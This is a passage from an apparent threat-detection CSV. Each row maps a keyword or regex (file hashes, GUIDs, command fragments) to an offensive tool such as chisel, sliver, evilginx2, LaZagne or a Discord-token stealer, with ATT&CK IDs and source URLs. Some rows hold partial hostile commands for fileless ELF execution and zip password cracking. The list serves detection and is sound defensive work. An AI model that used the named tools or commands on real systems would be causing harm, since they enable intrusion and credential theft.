"*fc5d03fa8fedd73efabd7066cfc4bbeb4777788c8a88301a5a27011239c6f994*",".{0,1000}fc5d03fa8fedd73efabd7066cfc4bbeb4777788c8a88301a5a27011239c6f994.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*fc62634b7cdf7a2397165512a48feafc25c2f1e80d7579dfca7e8a773c58a5c3*",".{0,1000}fc62634b7cdf7a2397165512a48feafc25c2f1e80d7579dfca7e8a773c58a5c3.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" 
"*fc8516a68f470a92e9e4dd80b5928ddd732d2de4b43b483d23d068bb92509f0c*",".{0,1000}fc8516a68f470a92e9e4dd80b5928ddd732d2de4b43b483d23d068bb92509f0c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fc959cac98096ae179061a564cdce68687a17768f90ec9af568a5b58c0adfb5a*",".{0,1000}fc959cac98096ae179061a564cdce68687a17768f90ec9af568a5b58c0adfb5a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fc9b91ba161b6dcf81cee6713bbf224e82c49e3166178c0d9ceb54f963250ce7*",".{0,1000}fc9b91ba161b6dcf81cee6713bbf224e82c49e3166178c0d9ceb54f963250ce7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fcc29a4c87c77c17f93c5b4703d34a4d94ee2f6b66dc149e539978c7cb4924ac*",".{0,1000}fcc29a4c87c77c17f93c5b4703d34a4d94ee2f6b66dc149e539978c7cb4924ac.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*FCD5E13D-1663-4226-8280-1C6A97933AB7*",".{0,1000}FCD5E13D\-1663\-4226\-8280\-1C6A97933AB7.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*fcda7875e75e4d74879ad122a5861477e30c825cb90aceb76ac885cc2eb7e6dc*",".{0,1000}fcda7875e75e4d74879ad122a5861477e30c825cb90aceb76ac885cc2eb7e6dc.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - 
TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*fcrackzip *",".{0,1000}fcrackzip\s.{0,1000}","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*fcrackzip *",".{0,1000}fcrackzip\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*fcrackzip -u -v -D -p *.zip*",".{0,1000}fcrackzip\s\-u\s\-v\s\-D\s\-p\s.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*fd04fd7f9fcc43cca1aca5ec9050e6f7229decc563b2e31c8d0af385d425980e*",".{0,1000}fd04fd7f9fcc43cca1aca5ec9050e6f7229decc563b2e31c8d0af385d425980e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*fd0571eeb3d23326429a47df6b1104383efca78191f36099897ec29e5a4da50e*",".{0,1000}fd0571eeb3d23326429a47df6b1104383efca78191f36099897ec29e5a4da50e.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local 
computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*fd13ae5d3ace637c564434554f669a30cd5d527c918d1681c856e62f2a4dea85*",".{0,1000}fd13ae5d3ace637c564434554f669a30cd5d527c918d1681c856e62f2a4dea85.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*fd735c976b71fe21f1f35dca8977865e69e4bb3a49ffb7c64c65d3a235d237a4*",".{0,1000}fd735c976b71fe21f1f35dca8977865e69e4bb3a49ffb7c64c65d3a235d237a4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*fd8dddeb318eb9ccdeea441dfed3a0b01c1187e1b165b75e7aaf515142abb171*",".{0,1000}fd8dddeb318eb9ccdeea441dfed3a0b01c1187e1b165b75e7aaf515142abb171.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*FD93D181-2EC5-4863-8A8F-5F8C84C06B35*",".{0,1000}FD93D181\-2EC5\-4863\-8A8F\-5F8C84C06B35.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*fd9af8832336604029ef8f8ce6c35f5b24efdcd593b5092ed4774dae62d8e9f8*",".{0,1000}fd9af8832336604029ef8f8ce6c35f5b24efdcd593b5092ed4774dae62d8e9f8.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*fda9ab818e038db8e7813ebfc1cdf52d3726c0ea08019b40d8b6088273d1bb07*",".{0,1000}fda9ab818e038db8e7813ebfc1cdf52d3726c0ea08019b40d8b6088273d1bb07.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*fdb1df0047a31328f0796bd07caf642efc35651ad78389025eb5afa2748bcd04*",".{0,1000}fdb1df0047a31328f0796bd07caf642efc35651ad78389025eb5afa2748bcd04.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - 
TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*fdb2a63af6a5ae9aa60ceceb9e928188ac793a89f5282ed44c0d4be5f79559bb*",".{0,1000}fdb2a63af6a5ae9aa60ceceb9e928188ac793a89f5282ed44c0d4be5f79559bb.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*fdbf3b81cd69caf5230d76a8b039fd99*",".{0,1000}fdbf3b81cd69caf5230d76a8b039fd99.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*fdc984c09659c0ebf330d319bdebc772440dde7543aa6f74fd523a02fca2811d*",".{0,1000}fdc984c09659c0ebf330d319bdebc772440dde7543aa6f74fd523a02fca2811d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*FDD654F5-5C54-4D93-BF8E-FAF11B00E3E9*",".{0,1000}FDD654F5\-5C54\-4D93\-BF8E\-FAF11B00E3E9.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*fde1b109f9704ff7.css*",".{0,1000}fde1b109f9704ff7\.css.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*fdeb5626b8c7d92daf188d05564398134d3dd50c9d1d2b09352a5d5a0d2757ee*",".{0,1000}fdeb5626b8c7d92daf188d05564398134d3dd50c9d1d2b09352a5d5a0d2757ee.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*FDF5A0F3-73DA-4A8B-804F-EDD499A176EF*",".{0,1000}FDF5A0F3\-73DA\-4A8B\-804F\-EDD499A176EF.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*FE068381-F170-4C37-82C4-11A81FE60F1A*",".{0,1000}FE068381\-F170\-4C37\-82C4\-11A81FE60F1A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense 
Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*fe22bb52058886459e0ff6f9c1c70b4604b15c30b5f1e3ebfc58305d4e94a7e3*",".{0,1000}fe22bb52058886459e0ff6f9c1c70b4604b15c30b5f1e3ebfc58305d4e94a7e3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fe2cc64a77ca3a7620a9ddec10f9f6e80769132f5587cece5dd03d419782481d*",".{0,1000}fe2cc64a77ca3a7620a9ddec10f9f6e80769132f5587cece5dd03d419782481d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*FE4414D9-1D7E-4EEB-B781-D278FE7A5619*",".{0,1000}FE4414D9\-1D7E\-4EEB\-B781\-D278FE7A5619.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","0","N/A","10","2","102","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*fe6f27e7f2f8b93fd436a7ec4e99c0e79b40e639772b5c8e378406c7b867bd63*",".{0,1000}fe6f27e7f2f8b93fd436a7ec4e99c0e79b40e639772b5c8e378406c7b867bd63.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*fe8a247e683cf8041cb460365a29793bacf26f8214b82a7b44d2f8fad3b0af12*",".{0,1000}fe8a247e683cf8041cb460365a29793bacf26f8214b82a7b44d2f8fad3b0af12.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*fe8db7541bc0c9d05dbd2e44e5eaa2bfd5c79968983860416636ea2792abfa5e*",".{0,1000}fe8db7541bc0c9d05dbd2e44e5eaa2bfd5c79968983860416636ea2792abfa5e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*FE8F0D23-BDD1-416D-8285-F947BA86D155*",".{0,1000}FE8F0D23\-BDD1\-416D\-8285\-F947BA86D155.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","0","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*fea01b74-7a60-4142-a54d-7aa8f6471c00*",".{0,1000}fea01b74\-7a60\-4142\-a54d\-7aa8f6471c00.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*fed31f6b45974dfe2f4edc4a180cb44b44caad65e872aa6c656db1d7d3729608*",".{0,1000}fed31f6b45974dfe2f4edc4a180cb44b44caad65e872aa6c656db1d7d3729608.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - 
T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*fed573df80a1aeb08f129824ce29906dd614fea7b3af704fa0e9324c26e5084a*",".{0,1000}fed573df80a1aeb08f129824ce29906dd614fea7b3af704fa0e9324c26e5084a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fee */* -l pl | perl*",".{0,1000}fee\s.{0,1000}\/.{0,1000}\s\-l\spl\s\|\sperl.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*fee */* -l pl | ruby*",".{0,1000}fee\s.{0,1000}\/.{0,1000}\s\-l\spl\s\|\sruby.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*fee -a *killall sshd* 
*busybox*",".{0,1000}fee\s\-a\s.{0,1000}killall\ssshd.{0,1000}\s.{0,1000}busybox.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*fee -c */* | ssh *@*",".{0,1000}fee\s\-c\s.{0,1000}\/.{0,1000}\s\|\sssh\s.{0,1000}\@.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*fee -c */* -w 64 | *",".{0,1000}fee\s\-c\s.{0,1000}\/.{0,1000}\s\-w\s64\s\|\s.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*fee8aa6d643d13d224330adb9389f37ec58c487cf91769158f5a650fa5522bde*",".{0,1000}fee8aa6d643d13d224330adb9389f37ec58c487cf91769158f5a650fa5522bde.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Fentanyl strikes again!*",".{0,1000}Fentanyl\sstrikes\sagain!.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*Fentanyl/fenty.py*",".{0,1000}Fentanyl\/fenty\.py.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - 
TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*feroxbuster -w *fzf-wordlists* -u *",".{0,1000}feroxbuster\s\-w\s.{0,1000}fzf\-wordlists.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Fertiliser.exe \\*",".{0,1000}Fertiliser\.exe\s\\\\.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*Fetching domain information through a Kerberos auth over LDAP*",".{0,1000}Fetching\sdomain\sinformation\sthrough\sa\sKerberos\sauth\sover\sLDAP.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*Fetching domain information through NTLM over LDAP*",".{0,1000}Fetching\sdomain\sinformation\sthrough\sNTLM\sover\sLDAP.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential 
